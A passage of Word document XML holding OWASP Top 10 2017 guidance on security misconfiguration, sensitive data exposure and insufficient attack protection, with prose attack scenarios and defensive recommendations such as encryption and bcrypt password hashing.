        <w:t> App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How Do I Prevent 'Security Misconfiguration'?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The primary recommendations are to establish all of the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tooltip="Top 10 2017-A9-Using Components with Known Vulnerabilities" w:history="1">
        <w:r w:rsidRPr="006F28A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>2017-A9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A strong application architecture that provides effective, secure separation between components.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An automated process to verify that configurations and settings are properly configured in all environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="004D49A4" w:rsidP="00EC066E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:tooltip="Top 10 2017-A6-Sensitive Data Exposure" w:history="1">
        <w:r w:rsidR="00EC066E" w:rsidRPr="00EC066E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A6-Sensitive Data Exposure</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> A site simply doesn’t use TLS for all authenticated pages. An attacker simply monitors network traffic (like an open wireless network), and steals the user’s session cookie. The attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password database. All of the unsalted hashes can be exposed with a rainbow table of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>precalculated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The full perils of unsafe cryptography, SSL/TLS usage, and data protection are well beyond the scope of the Top 10. That said, for all sensitive data, do the following, at a minimum:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t retain can’t be stolen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ensure strong standard algorithms and strong keys are used, and proper key management is in place. Consider using </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00EC066E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>FIPS 140 validated cryptographic modules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ensure passwords are stored with an algorithm specifically designed for password protection, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "http://en.wikipedia.org/wiki/Bcrypt" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00EC066E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>PBKDF2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "http://en.wikipedia.org/wiki/Scrypt" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>scrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="663366"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC066E" w:rsidRPr="00EC066E" w:rsidRDefault="00EC066E" w:rsidP="00EC066E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC066E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Disable autocomplete on forms requesting sensitive data and disable caching for pages that contain sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="004D49A4" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:tooltip="Top 10 2017-A7-Insufficient Attack Protection" w:history="1">
        <w:r w:rsidR="00D81337" w:rsidRPr="00D81337">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A7-Insufficient Attack Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D81337" w:rsidRPr="00D81337" w:rsidRDefault="00D81337" w:rsidP="00D81337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Attacker uses automated tool like </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tooltip="ZAP" w:history="1">
        <w:r w:rsidRPr="00D81337">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>OWASP ZAP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D81337">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
